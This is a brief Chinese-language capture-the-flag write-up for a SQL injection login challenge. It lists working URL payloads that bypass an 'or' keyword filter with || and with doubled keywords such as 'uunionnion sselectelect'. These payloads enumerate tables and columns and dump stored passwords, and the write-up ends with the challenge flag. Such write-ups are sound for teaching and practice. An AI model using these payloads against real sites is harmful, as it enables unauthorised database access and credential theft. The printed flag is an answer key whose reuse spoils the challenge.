1、使用万能密码登录
显示错误,而且or好像是被过滤了
将or换为||,登录成功
2、查询字段个数,由于存在or过滤,所以无法使用order by 来判断,因此采用拼接字符绕过,进行联合查询
?username=admin&password=admin' uunionnion sselectelect 1,2,3%23
3、查表
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23
4、查询表字段
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23
5、爆破数据
?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23
flag{efd91e9e-a5e3-47ee-acc1-ccd6aef806b9}